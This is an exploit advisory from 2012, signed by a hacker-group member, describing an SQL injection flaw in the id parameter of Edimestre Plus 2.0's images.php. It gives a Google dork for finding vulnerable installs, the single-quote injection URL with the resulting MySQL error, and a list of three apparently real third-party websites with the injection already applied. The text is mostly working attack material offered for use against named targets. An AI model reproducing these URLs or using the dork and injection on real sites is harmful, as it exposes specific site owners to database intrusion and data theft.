# Exploit Title: Edimestre Plus 2.0 - Sql injection Vulnerability
# Date: 24 June 2012
# Author: Dark-Puzzle
# Vendor Website : http://www.edimestre.ca/
# Version: 2.0 previous versions may also be vulnerable .
# Category: Webapps/0day
# Google dork: intext:"Powered by Edimaster Plus" inurl:images.php
# Tested on: Windows Xp Sp2 , Backtrack 5 .
Exploit :
http://www.example.com/modules/images/images.php?id=1&image=213&langue=en&menu=3
Howto:
the string (') must be added to ?id=7' without deleting the other functions
"&image=213&langue=en&menu=3"
else the sql error won't show up .
Example :
http://www.example.com/modules/images/images.php?id=1'&image=213&langue=en&menu=3
error :
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ') AND (langue = 'en') ORDER BY length(texteurl) DESC' at line 2
+other stuff below .
Example Sites :
http://www.pedxray.com/modules/images/images.php?id=7'&image=335&langue=en&menu=31
http://netic.ca/modules/images/images.php?id=17'&image=379&langue=en
http://www.bertrandrpitt.net/modules/images/images.php?id=3'&image=136&langue=en
More At Google .
DARK-PUZZLE (Souhail)
Follow me : https://www.facebook.com/dark.puzzle
Follow Moroccan Cyber Army : https://www.facebook.com/MAR.Cyber.Army
Greetz to : M.C.A , Team-Hunter , Dr.napst3r , Jigs@w ...